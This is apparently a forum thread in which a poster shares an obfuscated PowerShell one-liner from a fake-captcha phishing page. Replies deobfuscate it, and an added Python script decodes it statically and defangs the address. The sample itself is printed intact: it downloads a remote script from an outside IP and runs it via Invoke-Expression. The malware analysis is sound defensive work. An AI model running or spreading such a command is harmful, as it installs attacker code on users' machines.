Hi, we’re doing a write-up for a cybersecurity article - need some PowerShell experts to take a look at some code (we’re not versed at all in PowerShell) and let us know what they think.
A malicious email came into our honeypot this morning, linking to a spoof website that asked us to complete a captcha which furtively copied PowerShell code to the clipboard. The spoof site then asked us to hit Win+R and then Ctrl+V (so, basically, to paste the code into the Run dialog).
Can anyone let us know what the code below does? Thanks.
POWERSHELL "FUNCTION GO { &$JOO (&$GHJ '8898848.8818859.1881883.38887/87.8j88pg'.replace('8','')) };$SKK='SGDHDYEJHDIDCXMKDJDSRFG';$GHJ=$SKK[10]+$SKK[20]+$SKK[14];$JOO=$SKK[10]+$SKK[6]+$SKK[13]; GO"
The function uses Invoke-Expression to run the string data in the 7.jpg file, which is downloaded using Invoke-RestMethod.
It uses basic obfuscation to hide what it’s doing:
It obfuscates the URI by padding the IP address and filename with 8s. These are replaced to give the URI: 94[.]159[.]113[.]37/7.jpg
It obfuscates the commands by using variables in the function. The values of the variables $JOO and $GHJ are aliases for Invoke-Expression and Invoke-RestMethod. The variables are populated by extracting the characters at positions 10, 6 and 13 (IEX) and 10, 20 and 14 (IRM) from the string stored in the $SKK variable.
Because the variables are just strings, they have to be preceded by the ampersand to be executed as a command.
Unobfuscated, it would look like this (using square brackets to break the IP address to prevent accidental execution).
powershell "function GO { Invoke-Expression (Invoke-RestMethod 94[.]159[.]113[.]37/7.jpg) }; GO"
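As an added worked example (not code from either poster), the script below performs the same deobfuscation the answer above walks through, but statically, so nothing from the sample is ever executed. The sample input is the one-liner from the question, copied in as a string; the alias table is a small subset of PowerShell's built-in aliases that I assume covers the common cases; and the parser is deliberately limited to the two tricks this sample uses (string-index assembly of alias names, and a literal padded with a filler character that is stripped by .replace). It defangs any IPv4 address in the recovered URL with square brackets, the same convention the answer uses.

```python
import re

# Sample input: the obfuscated one-liner quoted in the question above.
SAMPLE = (
    "FUNCTION GO { &$JOO (&$GHJ '8898848.8818859.1881883.38887/87.8j88pg'"
    ".replace('8','')) };$SKK='SGDHDYEJHDIDCXMKDJDSRFG';"
    "$GHJ=$SKK[10]+$SKK[20]+$SKK[14];$JOO=$SKK[10]+$SKK[6]+$SKK[13]; GO"
)

# Assumption: a handful of built-in PowerShell aliases; extend as needed.
ALIASES = {
    "IEX": "Invoke-Expression",
    "IRM": "Invoke-RestMethod",
    "IWR": "Invoke-WebRequest",
    "ICM": "Invoke-Command",
    "SAPS": "Start-Process",
    "GC": "Get-Content",
}

STRING_VAR_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")                  # $NAME='literal'
INDEXED_VAR_RE = re.compile(r"\$(\w+)\s*=\s*((?:\$\w+\[\d+\]\s*\+?\s*)+)")  # $NAME=$SRC[i]+$SRC[j]...
INDEX_RE = re.compile(r"\$(\w+)\[(\d+)\]")
REPLACE_RE = re.compile(r"'([^']*)'\.replace\('([^']*)'\s*,\s*'([^']*)'\)", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\b")


def find_string_vars(script):
    """Collect $NAME='literal' assignments. Names are upper-cased because
    PowerShell variable names are case-insensitive."""
    return {m.group(1).upper(): m.group(2) for m in STRING_VAR_RE.finditer(script)}


def resolve_indexed_vars(script, strings):
    """Rebuild variables assembled as $SRC[i]+$SRC[j]+... from known string literals."""
    out = {}
    for m in INDEXED_VAR_RE.finditer(script):
        name, expr = m.group(1).upper(), m.group(2)
        try:
            out[name] = "".join(strings[src.upper()][int(i)] for src, i in INDEX_RE.findall(expr))
        except (KeyError, IndexError):
            continue  # references a string we do not know; leave it unresolved
    return out


def resolve_replace_literals(script):
    """Evaluate 'literal'.replace('a','b') expressions without running PowerShell."""
    return [m.group(1).replace(m.group(2), m.group(3)) for m in REPLACE_RE.finditer(script)]


def defang(text):
    """Bracket the dots of IPv4 addresses so the result cannot be clicked or pasted live."""
    return IPV4_RE.sub(r"\1[.]\2[.]\3[.]\4", text)


def strip_assignment(text, name):
    """Remove a "$name=...;" statement (assumes the right-hand side contains no ';')."""
    return re.sub(r"\$" + re.escape(name) + r"\s*=[^;]*;\s*", "", text, flags=re.IGNORECASE)


def deobfuscate(script):
    strings = find_string_vars(script)
    aliases = resolve_indexed_vars(script, strings)
    cmdlets = {name: ALIASES.get(val.upper(), val) for name, val in aliases.items()}
    rendered = script
    # 1. &$VAR (call operator on a string) -> the cmdlet the alias stands for.
    for name, cmdlet in cmdlets.items():
        rendered = re.sub(r"&\$" + re.escape(name) + r"\b", cmdlet, rendered, flags=re.IGNORECASE)
    # 2. 'literal'.replace('a','b') -> the evaluated, defanged literal.
    rendered = REPLACE_RE.sub(
        lambda m: "'" + defang(m.group(1).replace(m.group(2), m.group(3))) + "'", rendered)
    # 3. Drop the helper assignments that are now dead code.
    for name in cmdlets:
        rendered = strip_assignment(rendered, name)
    for name in strings:
        if len(re.findall(r"\$" + re.escape(name) + r"\b", rendered, flags=re.IGNORECASE)) == 1:
            rendered = strip_assignment(rendered, name)
    return {
        "strings": strings,
        "aliases": aliases,
        "cmdlets": cmdlets,
        "urls": [defang(u) for u in resolve_replace_literals(script)],
        "rendered": rendered,
    }


if __name__ == "__main__":
    result = deobfuscate(SAMPLE)
    for key in ("aliases", "cmdlets", "urls"):
        print(f"{key}: {result[key]}")
    print("rendered:", result["rendered"])
```

Running it against the sample prints the two aliases (GHJ = IRM, JOO = IEX), the cmdlets they expand to, the defanged URL 94[.]159[.]113[.]37/7.jpg, and the cleaned invocation with the dead $SKK/$GHJ/$JOO assignments removed. The point of doing this statically rather than in a PowerShell session with IEX swapped for Write-Host is that the sample is never parsed by PowerShell at all, so a second, overlooked trick in the string cannot fire.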
Ultimately, yes. The .jpg file it's downloading is unlikely to be an image; it'll be a string with more PowerShell commands in it. Those commands will be the ones that download and install any executables.
BleepingComputer.com has several good write-ups on it. The payload can actually change depending on whether you’re the target or not: